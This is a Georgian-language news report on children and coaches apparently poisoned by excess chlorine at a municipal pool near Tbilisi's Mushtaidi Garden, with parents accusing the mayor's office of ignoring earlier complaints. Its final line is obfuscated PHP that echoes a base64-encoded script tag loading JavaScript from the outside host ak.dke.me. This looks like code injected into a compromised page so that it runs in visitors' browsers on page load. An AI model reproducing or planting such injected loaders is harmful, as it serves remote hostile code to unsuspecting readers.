celsiusi
ავერსი შნაიდერი
მუშტაიდის ბაღთან მდებარე აუზზე, თბილისის მერიის დაქვემდებარებაშია, მოზარდები და მათი მწვრთნელი, სავარაუდოდ ქლორის ზედოზირებით მოიწამლნენ.
 
ისინი ამ დროისთვის სახლში მკურნალობენ. არასრულწლოვანების მშობლები მერიას გულგრილობასა და უყურადღებობაში ადანაშაულებენ. მათივე თქმით, მსგავსი ფაქტი ადრეც დაფიქსირდა, რის გამოც მათ მერიას მიმართეს ნივთიერების შეცვლის მოთხოვნით, თუმცა უწყებამ რეაგირება არ მოახდინა.
 
"650 ლარის ეკონომია გაკეთდა ქლორზე და ძალიან მოიწამლნენ. ირაკლი გვილავას ვაცნობე....იმ დროს ბავშვები არა, პირველი მე დამარტყა შემდეგ შემპირდნენ, რომ ყველაფერს გამოასწორებდნენ, მერიაში ირაკლი გვილავამ ყველაფერი იცოდა არავინ არ გამოასწორა ეს საკითხი. მეორედაც, როდესაც მომივიდა ეს, ყველა მშობელს ვეუბნებოდი, რომ იწამლებიან ბავშვები და არ შეიძლება ამის სუნთქვა. იმავენაირად მერიიდან მოვიდნენ, გამოსწორდება ყველაფერი, დიდუბის გამგეობაში მისული ვიყავი, რომ რეაგირება მოეხდინათ, თუმცა როგორც ყოველთვის რეაგირება არ იყო და მესამე ეტაპზე, მეორე მწვრთნელიც მოიწამლა, მისი ყველა ბავშვი იმიტომ , რომ კარები იყო დახურული, მე როდესაც შევედი შაბათს ვიგრძენი, რომ იყო ქლორი. კარები გავაღე, ჩემი ბავშვებიდან არის 6 მოწამლული" - ამბობს მწვრთნელი ნინო ქავზინაძე. 
 
წყარო: მთავარი არხი
412
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");